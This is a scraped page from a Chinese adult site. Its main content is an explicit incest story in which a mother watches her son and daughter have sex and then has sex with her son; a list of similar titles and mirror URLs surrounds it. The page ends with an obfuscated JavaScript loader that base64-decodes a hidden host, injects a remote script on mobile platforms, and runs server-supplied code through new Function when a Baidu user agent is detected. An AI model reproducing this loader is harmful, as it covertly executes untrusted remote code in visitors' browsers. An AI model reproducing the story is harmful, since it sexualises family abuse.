返回

妈妈的屁眼真棒fec

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

白雪笑呵呵的看着一双儿女。

阿芳裸体横陈,不胜娇羞。小强大汗淋漓,躺在二姐身边,还在轻轻的逗弄敏感的乳头。

小强问妈妈:「妈妈怎么也来了?」

白雪道:「自己的女儿和儿子在这里作爱,做妈妈的怎么能放弃观赏的机会呢!妈妈已经在外面观看很久了?」白雪接着又说;「看你们弄的,妈妈要给你们先清理清理?」真是体贴的母亲,白雪很快换了带雪的床单,擦干净女儿阿芳的小穴,和儿子的阴茎。

白雪和儿女们一起躺在床上,然后白雪问女儿:「你弟弟的大鸡巴怎么样,搞的你舒服吗?」阿芳被妈妈这样问,不好意思的恩了一声,算是回答了。

白雪说:「看到你们如此快乐的在一起作爱,妈妈十分高兴。」

小强和阿芳姐弟俩一起看着母亲。小强对妈妈说:「光是高兴吗,看到我和二姐的真人表演,妈妈没有兴奋吗?」

白雪笑道:「真是妈妈的乖儿子,这么了解妈妈,妈妈现在早已经湿透了。」说完,白雪在儿女面前毫不在乎的撩起睡衣,然后分开两腿,让女儿和儿子看她湿糊糊的肉穴。

小强说:「妈妈,为什么不让二姐看看儿子是怎么和妈妈作爱的呢?」小强很想在二姐的面前搞妈妈,这样会更刺激更过瘾。

白雪先看看女儿阿芳,然后又看着儿子说:「是啊,妈妈也是这么想的,让女儿看看妈妈是怎么和自己的亲生儿子作爱。不过今天由妈妈来搞儿子。」小强和阿芳还没有明白妈妈的意思,就见妈妈来到儿子跟前,用手握住儿子的大鸡巴,这时大鸡巴早已经恢复了活力。

白雪特意看了女儿阿芳一眼,然后慢慢的把性感的嘴唇靠近大鸡巴,把大鸡巴前端的龟头贴在嘴唇上摩擦着,接着伸出湿润的舌头,灵巧的撩拨舔弄龟头和马眼,这样玩弄了一会,接着张开嘴巴,缓缓的把儿子20多厘米的大鸡巴含进,到一半的时候退出,然后在含进去,同时用手套弄着后半部分。

阿芳一直都没有机会特别注意弟弟小强的阴茎,本来就奇怪那么大的鸡巴竟然能插进自己那么窄小的肉穴。现在又看到自己的妈妈竟然用嘴巴含着弟弟的大鸡巴一前一后的套弄,几乎惊讶得目瞪口呆,不知道说什么好了。

小强也没想到妈妈在女儿的面前和他作爱会变得这样骚浪,大鸡巴产生特别的快感。

白雪为儿子小强口交了一会,对女儿阿芳说:「看着妈妈是怎么享受儿子的大鸡巴的。」说完,白雪移动身体,使自己的肉穴靠近儿子的大鸡巴,一只手分开阴唇,一只手扶着大鸡巴,然后慢慢的往下坐,就见儿子小强20多厘米的大鸡巴一点一点的进入她的身体,直到全部进入。

「哦……小强的大鸡巴真棒,把妈妈的骚穴涨得满满的?」

小强笑着对二姐阿芳说:「二姐你看妈妈多骚。」

阿芳这时候正专心的观看大鸡巴进入小穴的情形,被弟弟一问,说;「要不怎么会便宜到你呢?」阿芳也觉得妈妈真是骚透了。

小强马上说:「二姐也是因为骚才便宜弟弟的吗?」

阿芳没想到弟弟小强会如此说,故意生气的说:「好啊小强,得了便宜还要卖乖,看我不打你?」阿芳怎么会舍得真打可爱的弟弟呢,只是在小强的脑袋上轻拍了一下。

白雪见女儿和儿子在这时候还在嬉闹,真是哭笑不得,自己脱掉睡衣使全身赤裸,也不管儿子和女儿,自顾自的用骚穴套弄起儿子的大鸡巴来,因为身体一直处于十分兴奋的状态,所以儿子的大鸡巴每一次进出骚穴,都产生强烈的刺激和快感。

小强被妈妈开始套弄大鸡巴,也不在和二姐阿芳嬉闹了,而是专心的和妈妈搞起来,仔细体会妈妈湿润火热的骚穴给大鸡巴带来的快感。

阿芳也被妈妈和弟弟交合的地方吸引住,痴迷的看着弟弟小强的大鸡巴一次一次进出妈妈的身体。

白雪一面快速的套弄着,一面不停的夸奖着儿子的大鸡巴:「哦……儿子……大鸡巴……真棒。……又大又热……啊……妈妈的……骚穴……舒服……死了……噢……小强……妈妈……要来了……快……狠狠的干……妈妈……哦……太舒服了……」小强一见妈妈到达高潮,竟趴在他身上不能动了,同时听到妈妈的要求,立刻狠狠的向上挺动自己的大鸡巴,冲击着妈妈的骚穴。

白雪高潮过去,无力的瘫软在儿子的身体上,任凭儿子在下面继续操弄她的骚穴。高潮后的骚穴异常敏感,儿子每一次的撞击,都使她产生昏迷感。

「哦……妈妈的骚穴更湿润了,大鸡巴好舒服?」因为妈妈白雪流出更多的淫水,小强越干越舒服过瘾。所以小强又狠狠的操弄了有20分钟。

白雪几乎被儿子粗大有力的鸡巴给操昏了,只好想儿子求饶说:「乖儿子,你怎么越来越厉害了,妈妈要被你弄死了,快点射了好吗。」

小强一面继续干一面说:「妈妈受不了了吗,但儿子还没有弄过瘾呢?」

「乖儿子,妈妈求你了,妈妈的骚穴实在不行了?」也许是太兴奋,白雪也感到今天十分不经弄,平时她可以被儿子的大鸡巴弄几个小时都没什么问题。

小强见妈妈真的不行了,只好叫妈妈从身上下来。白雪立刻栽倒在一旁,急促的喘息着。

阿芳见了,过来为妈妈摩挲着胸口,对弟弟小强说:「看你,怎么把妈妈搞成这样。」

小强忙解释到:「妈妈平时不是这么不经弄的,一定是有二姐在一边看着,妈妈太兴奋了?」

过了好一会,白雪终于恢复过来,白了儿子一眼说:「要是把妈妈的穴弄坏了以后就没的弄了,一点也不爱惜妈妈的穴。」

小强忙说:「怎么怪起儿子来,是妈妈太骚了,而且儿子还没有尽兴呢,妈妈你看?」

白雪也知道儿子还没有射精,望着儿子依然坚挺的大鸡巴说:「要不妈妈用嘴巴给你弄出来吧,妈妈很久没喝儿子的精液了。」阿芳一听更是惊讶,难道妈妈让小强在嘴巴里射精,而且还要喝下去,妈妈可真是太骚了。

评分
相关推荐
3.0分

3.0分 妈妈的屁眼be4

3.0分

3.0分 妈妈的小屁眼cd1

3.0分

3.0分 姨妈的屁眼5a2

3.0分

3.0分 戳妈妈的屁眼-乱伦小说c3c

3.0分

3.0分 调教妈妈的屁眼-乱伦小说9c8

3.0分

3.0分 夺走妈咪的处女屁眼82f

3.0分

3.0分 妈妈美妙的处女屁眼【完】(作者:不详)7ae

3.0分

3.0分 利用妈妈屁眼的“手淫”【完】(作者:不详)99d

3.0分

3.0分 妈妈的眼泪ae5

3.0分

3.0分 征服阿妈的处女屁眼天缘d30

3.0分

3.0分 大屁股妈妈7e1

3.0分

3.0分 大屁股妈妈7e1

3.0分

3.0分 【妈妈的屁股给我爽】【完】517

3.0分

3.0分 腿上坐着妈妈的屁股ec4

3.0分

3.0分 妈妈的外号叫大屁股d84

3.0分

3.0分 妈妈的穴真紧b92


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};